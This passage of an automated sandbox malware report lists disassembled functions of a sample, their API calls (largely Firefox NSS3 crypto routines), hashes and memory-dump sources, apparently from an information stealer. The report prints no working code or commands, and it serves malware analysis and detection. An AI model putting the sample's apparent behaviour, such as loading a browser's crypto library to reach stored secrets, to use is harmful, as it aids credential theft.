                                                                                                                                              • Instruction ID: d115f833f3db6ce0b8eb3292e7153cabc54ab2757b2e5513756afe9fd5ad510a
                                                                                                                                              • Opcode Fuzzy Hash: 543463517c4c037c1904ecc1e57fb459065f4de38996540a2ba8dd0db2e6fad7
                                                                                                                                              • Instruction Fuzzy Hash: 05314731A456668FC700CF68CC9CAABBBB1AF86394B098554EE581BB41D370EC06C3F4
                                                                                                                                              Function 6C6F0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C6F0BDE), ref: 6C6F0DCB
                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6C6F0BDE), ref: 6C6F0DEA
                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C6F0BDE), ref: 6C6F0DFC
                                                                                                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C6F0BDE), ref: 6C6F0E32
                                                                                                                                              Strings
                                                                                                                                              • %s incr => %d (find lib), xrefs: 6C6F0E2D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strrchr$Print_stricmp
                                                                                                                                              • String ID: %s incr => %d (find lib)
                                                                                                                                              • API String ID: 97259331-2309350800
                                                                                                                                              • Opcode ID: 2d37711696f4cd68a0e1c7e2979916f6e72e4692ec1c8c21af71f509f5a82ce1
                                                                                                                                              • Instruction ID: 81bb00edc7817f264eb9a21175458e3463a9a07a2e82cfef28ecfa9243259a20
                                                                                                                                              • Opcode Fuzzy Hash: 2d37711696f4cd68a0e1c7e2979916f6e72e4692ec1c8c21af71f509f5a82ce1
                                                                                                                                              • Instruction Fuzzy Hash: FE01F1727002149FE6308F298C49E67B3EEDB45B08B04487DE909D3A42E761EC16CBE1
                                                                                                                                              Function 6C7AAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PK11_FreeSymKey.NSS3(?,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC2D
                                                                                                                                                • Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
                                                                                                                                                • Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
                                                                                                                                                • Part of subcall function 6C74ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
                                                                                                                                                • Part of subcall function 6C74ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
                                                                                                                                                • Part of subcall function 6C74ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
                                                                                                                                                • Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
                                                                                                                                                • Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9
                                                                                                                                              • PK11_FreeSymKey.NSS3(?,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC44
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC59
                                                                                                                                              • free.MOZGLUE(8CB6FF01,6C786AC6,?,?,?,?,?,?,?,?,?,?,6C795D40,00000000,?,6C79AAD4), ref: 6C7AAC62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                              • String ID: @]yl
                                                                                                                                              • API String ID: 1595327144-1691211022
                                                                                                                                              • Opcode ID: 160e891dab6f24cec4b214c534612e3bc929b7585f2df50a7318ca8fcc5be063
                                                                                                                                              • Instruction ID: 5c0ef5fc7182319a61cd9911c43402cb4a8f5671bead164b9ab68f33ecf3ad60
                                                                                                                                              • Opcode Fuzzy Hash: 160e891dab6f24cec4b214c534612e3bc929b7585f2df50a7318ca8fcc5be063
                                                                                                                                              • Instruction Fuzzy Hash: FD014FB56002009FEB10DF55EAC5B5677A8AF4476CF188078E9498F706D735E845CFA2
                                                                                                                                              Function 6C699C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C699CF2
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C699D45
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C699D8B
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C699DDE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                              • Opcode ID: af7f1fd9746e0b2d04a47622d295a6ed90fdec4760f7a7c224e9b720fbf50b1f
                                                                                                                                              • Instruction ID: 7cd1e0245c7cc6127651dd72ca58e7ce6ed8f7033ce3e1cc0a4670c99fc2caf8
                                                                                                                                              • Opcode Fuzzy Hash: af7f1fd9746e0b2d04a47622d295a6ed90fdec4760f7a7c224e9b720fbf50b1f
                                                                                                                                              • Instruction Fuzzy Hash: 1EA1AC31B041018FEB68DF65E99867E3771BB8771DF18113CE40A47A41DB3AA846CBCA
                                                                                                                                              Function 6C721E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C721ECC
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
                                                                                                                                                • Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
                                                                                                                                                • Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C721EDF
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C721EEF
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C721F37
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C721F44
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3539092540-0
                                                                                                                                              • Opcode ID: 948a353427732d696c24b7f33c8275603a9dd50144968edd164e7d940dc96245
                                                                                                                                              • Instruction ID: fb305ad0068a0292aa1b1909054c27e76d5d993bf23bb6baf98250f6048be039
                                                                                                                                              • Opcode Fuzzy Hash: 948a353427732d696c24b7f33c8275603a9dd50144968edd164e7d940dc96245
                                                                                                                                              • Instruction Fuzzy Hash: CF71BE729083019FD720CF24D944A5BB7F5FF88358F144929E8A893B21E736F959CB92
                                                                                                                                              Function 6C7ADD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADE1B
                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C7ADE77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2700453212-0
                                                                                                                                              • Opcode ID: deec06b65b3a778f0e7bfbc5fa628838e09cc1cc42c6d9835a9339e1be34b9fd
                                                                                                                                              • Instruction ID: ebee2bd04381fb5372e047a0b9ad1bf48565f17c5f155adf9c11d210776d2c88
                                                                                                                                              • Opcode Fuzzy Hash: deec06b65b3a778f0e7bfbc5fa628838e09cc1cc42c6d9835a9339e1be34b9fd
                                                                                                                                              • Instruction Fuzzy Hash: C1715571A04314CFDB20CF99C68468AB7B4BF69718F25827EDD696B702D770A942CF80
                                                                                                                                              Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strtok_s.MSVCRT ref: 00410FE8
                                                                                                                                              • strtok_s.MSVCRT ref: 0041112D
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                              • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                                                                                                                              • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                                                                                                                              • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                                                                                                                              • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                                                                                                                              Function 6C6FEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C6FEDFD
                                                                                                                                              • calloc.MOZGLUE(00000001,00000000), ref: 6C6FEE64
                                                                                                                                              • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C6FEECC
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6FEEEB
                                                                                                                                              • free.MOZGLUE(?), ref: 6C6FEEF6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorValuecallocfreememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3833505462-0
                                                                                                                                              • Opcode ID: 3e7702338032358e8aef3144fd496d1a1cee086db06c4d40e29efce3a88302d1
                                                                                                                                              • Instruction ID: 34319f1441cd08e6e3f616af5f6aeb1c7ae1ec53cc54ac4f510e94a36c88ed18
                                                                                                                                              • Opcode Fuzzy Hash: 3e7702338032358e8aef3144fd496d1a1cee086db06c4d40e29efce3a88302d1
                                                                                                                                              • Instruction Fuzzy Hash: B23139B16042019BE7209F2DEC447A63FF6FB46318F140538E8AA87A51D731E817CBD6
                                                                                                                                              Function 6C701DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C701E0B
                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C701E24
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C701E3B
                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C701E8A
                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C701EAD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1529734605-0
                                                                                                                                              • Opcode ID: b26be85d3b31e469fcae5b4a98fa2cb93be01e2c7c6929402a322bec67af8526
                                                                                                                                              • Instruction ID: b24940f7517140361e428751cdc242d60059cc523c0da46dccf3c770d3ec74e2
                                                                                                                                              • Opcode Fuzzy Hash: b26be85d3b31e469fcae5b4a98fa2cb93be01e2c7c6929402a322bec67af8526
                                                                                                                                              • Instruction Fuzzy Hash: 502125B2F04311ABD7008E69DE48B8F73D89B8476EF148638ED5957780E730D90887D2
                                                                                                                                              Function 6C75BE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C70E708,00000000,00000000,00000004,00000000), ref: 6C75BE6A
                                                                                                                                                • Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7104DC,?), ref: 6C75BE7E
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C75BEC2
                                                                                                                                              • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7104DC,?,?), ref: 6C75BED7
                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C75BEEB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1367977078-0
                                                                                                                                              • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                              • Instruction ID: 88c314ad63180daf64819070a967eb0bd8c2e1d574033d105d291c27f6043c61
                                                                                                                                              • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                              • Instruction Fuzzy Hash: A3110866B0424967E70089669F88F77736DAB40758F884135FE0597B92EF32EC2487E1
                                                                                                                                              Function 6C70AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000,00000000), ref: 6C70ADA7
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000,00000000), ref: 6C70ADB4
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6C703FFF,?,?,?,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000), ref: 6C70ADD5
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8294B0,?,?,?,?,?,?,?,?,6C703FFF,00000000,?), ref: 6C70ADEC
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C703FFF), ref: 6C70AE3C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2372449006-0
                                                                                                                                              • Opcode ID: 2da06d118904eaf8b3dfcf1f5537b858641f87274ba7bf570cf61b1e75ab437d
                                                                                                                                              • Instruction ID: bc7fca46ca59e37a1aee253d5750c7dd94337834abe962eb5ae88f90b1e104c9
                                                                                                                                              • Opcode Fuzzy Hash: 2da06d118904eaf8b3dfcf1f5537b858641f87274ba7bf570cf61b1e75ab437d
                                                                                                                                              • Instruction Fuzzy Hash: A81133A1F002056BE7109A659E09BBF72EC9F9125CF044238EC19D6B41FB20E998C3E2
                                                                                                                                              Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,009996C0,?,004210F4,?,00000000,?), ref: 00416C0C
                                                                                                                                              • sscanf.NTDLL ref: 00416C39
